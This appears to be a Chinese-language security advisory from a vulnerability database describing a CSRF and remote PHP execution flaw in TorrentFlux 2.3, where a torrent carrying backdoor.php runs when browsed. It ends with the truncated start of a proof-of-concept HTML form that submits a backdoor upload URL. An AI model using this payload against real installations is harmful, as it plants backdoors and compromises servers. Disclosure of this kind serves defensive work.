TorrentFlux跨站请求伪造及远程PHP脚本执行漏洞

2008-04-23T00:00:00
ID SSV:3194
Type seebug
Reporter Root
Modified 2008-04-23T00:00:00

Description

BUGTRAQ ID: 28846

TorrentFlux是使用PHP编写的BitTorrent下载客户端。如果架设在Web服务器上,便可以通过Web界面对BitTorrent下载进行管理。

TorrentFlux在处理下载文件的浏览时存在漏洞,远程攻击者可能利用此漏洞在用户系统上执行恶意代码。

如果用户受骗使用TorrentFlux下载了包含有backdoor.php文件的torrent的话,则在http://localhost/torrentflux_2.3/html/downloads/USER_NAME/ 查看该文件时就会导致执行该文件。无需口令便可以访问这个文件夹,但需要知道用户名。

TorrentFlux 2.3 final TorrentFlux


目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

<a href=http://www.torrentflux.com/ target=_blank>http://www.torrentflux.com/</a>

                                        
                                            
                                                &lt;form&nbsp;id='file_attack'&nbsp;method=&quot;post&quot;&nbsp;action=&quot;http://localhost/torrentflux_2.3/html/index.php&quot;&gt;
&lt;input&nbsp;type=hidden&nbsp;name=&quot;url_upload&quot;&nbsp;value=&quot;http://localhost/backdoor.php.